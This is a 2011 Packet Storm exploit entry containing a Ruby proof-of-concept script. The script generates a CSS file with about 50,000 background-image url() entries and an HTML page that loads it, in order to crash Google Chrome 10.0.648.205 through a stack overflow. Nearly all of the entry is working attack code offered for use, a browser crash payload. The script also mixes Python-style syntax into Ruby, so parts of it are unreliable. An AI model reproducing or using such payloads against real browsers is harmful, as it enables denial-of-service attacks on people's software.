Google Chrome 10.0.648.205 Stack Overflow

2011-04-18T00:00:00
ID PACKETSTORM:100547
Type packetstorm
Reporter C4SS!0 G0M3S
Modified 2011-04-18T00:00:00

Description

                                        
                                            `#!/usr/bin/ruby  
#  
#[+]Exploit Title: Google Chrome 10.0.648.205 Stack Overflow Vulnerability  
#[+]Date: 17\04\2011  
#[+]Author: C4SS!0 G0M3S  
#[+]Software Link: http://www.google.com/chrome  
#[+]Version: 10.0.648.205  
#[+]Teste On: WIN-XP SP3 Brazilian Portuguese  
#[+]CVE: N/A  
#  
#  
#  
#About:  
#  
#This is a bug of the Stack Overflow   
#that occurs when the safari or google chrome  
#deals with many URLs in the background-image  
#only causes a crash does not allow code execution.  
#  
#  
  
print """  
  
Created By C4SS!0 G0M3S  
E-mail Louredo_@hotmail.com  
Site www.exploit-br.org  
"""  
css = """  
body  
{  
background-image:"""  
i=0  
while i<50000:  
css += "url('imagem.bmp'),"  
i+=1  
end  
css += "url('imagem.bmp');\n}\n"  
print "[+]Creating File style.css...\n"  
sleep(1)  
begin  
  
f = File.open("style.css","wb")  
f.write css  
f.close  
rescue  
print "Error:\n#{$!}\n"  
exit  
end  
print "[+]File Style.css Created With Sucess\n"  
sleep(1)  
HTML = '''  
<html>  
<head>  
  
<link rel="stylesheet" type="text/css" href="style.css"></link>  
  
</head>  
<body>  
  
  
</body>  
</html>  
'''  
print "[+]Creating File Exploit.html...\n"  
sleep(1)  
begin  
f = File.open("Exploit.html","wb")  
f.write HTML  
f.close  
rescue  
print "Error:\n#{$!}\n"  
end  
print "[+]File Exploit.html Created With Success\n"  
sleep(1)`